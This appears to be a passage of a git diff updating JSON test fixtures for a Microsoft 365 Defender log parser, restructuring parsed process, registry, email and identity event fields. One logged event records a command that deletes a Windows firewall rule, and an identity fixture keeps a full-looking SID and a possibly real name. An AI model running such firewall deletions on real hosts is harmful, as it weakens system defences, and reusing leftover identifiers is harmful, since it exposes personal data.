\"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "message": "{\"time\":\"2024-11-08T14:39:36.1544409Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:39:21.6551859Z\",\"properties\":{\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessFileSize\":145408,\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"file.exe\",\"InitiatingProcessParentFileName\":\"file.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\file.exe\",\"InitiatingProcessCommandLine\":\"CommandExec.exe -Embedding ABCDEF0123456789 E Global\\\\HOST0000\",\"SHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"FileSize\":82944,\"MD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"FolderPath\":\"C:\\\\Windows\\\\processcommand.exe\",\"ProcessCommandLine\":\"\\\"processcommand.exe\\\" advfirewall firewall delete rule name=\\\"program=description= embedded HTTP server incoming traffic\\\"\",\"FileName\":\"processcommand.exe\",\"ProcessId\":4520,\"InitiatingProcessId\":10868,\"ProcessCreationTime\":\"2024-11-08T14:38:51.9030484Z\",\"DeviceName\":\"host.group.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:00.6744945Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessSignatureStatus\":\"Valid\",\"InitiatingProcessSignerType\":\"OsVendor\",\"InitiatingProcessParentId\":14840,\"ReportId\":17318,\"InitiatingProcessParentCreationTime\":\"2024-11-08T14:37:49.152209Z\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"InitiatingProcessIntegrityLevel\":\"System\",\"AccountDomain\":\"account domain\",\"AccountName\":\"syst\u00e8me\",\"ProcessTokenElevation\":\"TokenElevationTypeDefault\",\"ProcessIntegrityLevel\":\"System\",\"AccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"SHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"InitiatingProcessLogonId\":999,\"LogonId\":999,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"DesktopName\\\":\\\"Win\\\\\\\\Default\\\"}\",\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"file\",\"InitiatingProcessVersionInfoOriginalFileName\":\"file.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"ProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"ProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"ProcessVersionInfoProductVersion\":\"10.0.22621.1\",\"ProcessVersionInfoInternalFileName\":\"processcommand.exe\",\"ProcessVersionInfoOriginalFileName\":\"processcommand.exe\",\"ProcessVersionInfoFileDescription\":\"Network Command Shell\",\"InitiatingProcessSessionId\":0,\"CreatedProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-11-08T14:38:51.9073727Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", "event": { "category": [ "process" @@ -13,70 +19,119 @@ "info" ] }, - "@timestamp": "2024-10-22T15:09:44.594155Z", + "@timestamp": "2024-11-08T14:38:51.907372Z", "action": { "properties": { - "InitiatingProcessLogonId": "0", - "LogonId": "0" + "AccountSid": "S-1-2-3", + "LogonId": "999", + "process": { + "IntegrityLevel": "System", + "TokenElevation": "TokenElevationTypeDefault", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Network Command Shell", + "VersionInfoInternalFileName": "processcommand.exe", + "VersionInfoOriginalFileName": "processcommand.exe", + "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "VersionInfoProductVersion": "10.0.22621.1", + "parent": { + "CommandLine": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000", + "FileSize": 145408, + "IntegrityLevel": "System", + "LogonId": "999", + "TokenElevation": "TokenElevationTypeDefault", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Windows\u00ae installer", + "VersionInfoInternalFileName": "file", + "VersionInfoOriginalFileName": "file.exe", + "VersionInfoProductName": "Windows Installer - Unicode", + "VersionInfoProductVersion": "5.0.22621.3880" + } + } }, "type": "ProcessCreated" }, "file": { - "directory": "/usr/bin/ps", + "directory": "C:\\Windows\\processcommand.exe", "hash": { - "md5": "098f6bcd4621d373cade4e832627b4f6", - "sha1": "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3", - "sha256": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08" + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" }, - "name": "ps", - "size": 144632 + "name": "processcommand.exe", + "size": 82944 }, "host": { - "id": "86dd1cf45142e904cb2e99c2721fac3ca198c6ca", - "name": "computer.intranet.example" + "id": "123456789abcdef", + "name": "host.group.local" }, "microsoft": { "defender": { "report": { - "id": "67417" + "id": "17318" } } }, "process": { "args": [ - "--no-headers", - "-A", - "-o", - "comm,pid,pcpu,pmem,rss,etimes" + "HTTP", + "advfirewall", + "delete", + "embedded", + "firewall", + "incoming", + "name=\"program=description=", + "rule", + "server", + "traffic\"" ], - "code_signature": { - "status": "Unknown", - "subject_name": "Unknown" - }, - "command_line": "/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers", + "command_line": "\"processcommand.exe\" advfirewall firewall delete rule name=\"program=description= embedded HTTP server incoming traffic\"", + "name": "processcommand.exe", "parent": { - "pid": 0 + "args": [ + "-Embedding", + "ABCDEF0123456789", + "E", + "Global\\HOST0000" + ], + "code_signature": { + "status": "Valid", + "subject_name": "OsVendor" + }, + "command_line": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000", + "executable": "c:\\windows\\file.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "file.exe", + "pid": 10868, + "start": "2024-11-08T14:38:00.674494Z", + "user": { + "domain": "account domain", + "id": "S-1-2-3", + "name": "syst\u00e8me" + }, + "working_directory": "c:\\windows" }, - "pid": 423627, - "start": "2024-10-22T15:09:44.594155Z", - "user": { - "domain": "computer", - "name": "root" - } + "pid": 4520, + "start": "2024-11-08T14:38:51.903048Z", + "working_directory": "C:\\Windows" }, "related": { "hash": [ - "098f6bcd4621d373cade4e832627b4f6", - "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08", - "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3" + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" ], "user": [ - "root" + "syst\u00e8me" ] }, "user": { - "domain": "computer", - "name": "root" + "domain": "account domain", + "name": "syst\u00e8me" } } } \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json b/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json index 3fe0d2cf8..212f23549 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json @@ -16,17 +16,19 @@ "@timestamp": "2023-01-04T14:35:20.616193Z", "action": { "properties": { - "InitiatingProcessCommandLine": "\"omadmclient.exe\" /serverid \"1F2E9005-CEAB-4280-83A7-8429D26DE773\" /lookuptype 1 /initiator 0", - "InitiatingProcessFileSize": 445440, - "InitiatingProcessIntegrityLevel": "System", - "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", - "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", - "InitiatingProcessVersionInfoFileDescription": "Host Process for OMA-DM Client", - "InitiatingProcessVersionInfoInternalFileName": "omadmclient", - "InitiatingProcessVersionInfoOriginalFileName": "omadmclient.exe", - "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "InitiatingProcessVersionInfoProductVersion": "10.0.19041.2193", - "PreviousRegistryKey": "HKEY_LOCAL_MACHINE\\BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements" + "PreviousRegistryKey": "HKEY_LOCAL_MACHINE\\BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements", + "process": { + "CommandLine": "\"omadmclient.exe\" /serverid \"1F2E9005-CEAB-4280-83A7-8429D26DE773\" /lookuptype 1 /initiator 0", + "FileSize": 445440, + "IntegrityLevel": "System", + "TokenElevation": "TokenElevationTypeDefault", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Host Process for OMA-DM Client", + "VersionInfoInternalFileName": "omadmclient", + "VersionInfoOriginalFileName": "omadmclient.exe", + "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "VersionInfoProductVersion": "10.0.19041.2193" + } }, "type": "RegistryKeyDeleted" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json index a04e0e8be..72f93da4e 100644 --- a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json +++ b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json @@ -16,7 +16,11 @@ "@timestamp": "2024-10-22T15:09:47.246794Z", "action": { "properties": { - "InitiatingProcessLogonId": "0" + "process": { + "parent": { + "LogonId": "0" + } + } }, "type": "ScriptContent" }, @@ -38,10 +42,9 @@ }, "process": { "parent": { - "pid": 0 - }, - "pid": 423638, - "start": "2024-10-22T15:09:47.165481Z" + "pid": 423638, + "start": "2024-10-22T15:09:47.165481Z" + } }, "related": { "hash": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_email_events.json b/Microsoft/microsoft-365-defender/tests/test_email_events.json index 294c92d60..5f3e9f9b1 100644 --- a/Microsoft/microsoft-365-defender/tests/test_email_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_email_events.json @@ -17,16 +17,18 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "InitiatingProcessFileSize": 14687048, - "InitiatingProcessLogonId": "121834210", - "InitiatingProcessVersionInfoCompanyName": "Google", - "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", - "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", - "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", - "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", - "InitiatingProcessVersionInfoProductVersion": "102.286.200" + "process": { + "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "FileSize": 14687048, + "LogonId": "121834210", + "VersionInfoCompanyName": "Google", + "VersionInfoFileDescription": "Software Reporter Tool", + "VersionInfoInternalFileName": "software_reporter_tool_exe", + "VersionInfoOriginalFileName": "software_reporter_tool.exe", + "VersionInfoProductName": "Software Reporter Tool", + "VersionInfoProductVersion": "102.286.200" + } }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json b/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json index f2ac938fb..122a2bc61 100644 --- a/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json +++ b/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json @@ -3,7 +3,7 @@ "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<1@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}" }, "expected": { - "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<01020192520c9bb4-8a4c9d72-a832-47b9-a13f-ce92d3da71ba-000000@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}", + "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<1@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}", "event": { "action": "Moved to quarantine", "category": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_email_url_info.json b/Microsoft/microsoft-365-defender/tests/test_email_url_info.json index 031a0b50a..57b4e7abc 100644 --- a/Microsoft/microsoft-365-defender/tests/test_email_url_info.json +++ b/Microsoft/microsoft-365-defender/tests/test_email_url_info.json @@ -16,16 +16,18 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "InitiatingProcessFileSize": 14687048, - "InitiatingProcessLogonId": "121834210", - "InitiatingProcessVersionInfoCompanyName": "Google", - "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", - "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", - "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", - "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", - "InitiatingProcessVersionInfoProductVersion": "102.286.200" + "process": { + "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "FileSize": 14687048, + "LogonId": "121834210", + "VersionInfoCompanyName": "Google", + "VersionInfoFileDescription": "Software Reporter Tool", + "VersionInfoInternalFileName": "software_reporter_tool_exe", + "VersionInfoOriginalFileName": "software_reporter_tool.exe", + "VersionInfoProductName": "Software Reporter Tool", + "VersionInfoProductVersion": "102.286.200" + } }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_directory.json b/Microsoft/microsoft-365-defender/tests/test_identity_directory.json index 7d110bb54..e45140956 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_directory.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_directory.json @@ -16,16 +16,18 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "InitiatingProcessFileSize": 14687048, - "InitiatingProcessLogonId": "121834210", - "InitiatingProcessVersionInfoCompanyName": "Google", - "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", - "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", - "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", - "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", - "InitiatingProcessVersionInfoProductVersion": "102.286.200" + "process": { + "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "FileSize": 14687048, + "LogonId": "121834210", + "VersionInfoCompanyName": "Google", + "VersionInfoFileDescription": "Software Reporter Tool", + "VersionInfoInternalFileName": "software_reporter_tool_exe", + "VersionInfoOriginalFileName": "software_reporter_tool.exe", + "VersionInfoProductName": "Software Reporter Tool", + "VersionInfoProductVersion": "102.286.200" + } }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_info.json b/Microsoft/microsoft-365-defender/tests/test_identity_info.json index 0a0174b85..f1753e2d7 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_info.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_info.json @@ -16,16 +16,18 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "InitiatingProcessFileSize": 14687048, - "InitiatingProcessLogonId": "121834210", - "InitiatingProcessVersionInfoCompanyName": "Google", - "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", - "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", - "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", - "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", - "InitiatingProcessVersionInfoProductVersion": "102.286.200" + "process": { + "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "FileSize": 14687048, + "LogonId": "121834210", + "VersionInfoCompanyName": "Google", + "VersionInfoFileDescription": "Software Reporter Tool", + "VersionInfoInternalFileName": "software_reporter_tool_exe", + "VersionInfoOriginalFileName": "software_reporter_tool.exe", + "VersionInfoProductName": "Software Reporter Tool", + "VersionInfoProductVersion": "102.286.200" + } }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json b/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json index de75ec66d..0948ffe48 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json @@ -3,7 +3,7 @@ "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}" }, "expected": { - "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1-5-21-2308620423-2764619233-3639949770-5127445\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}", + "message": 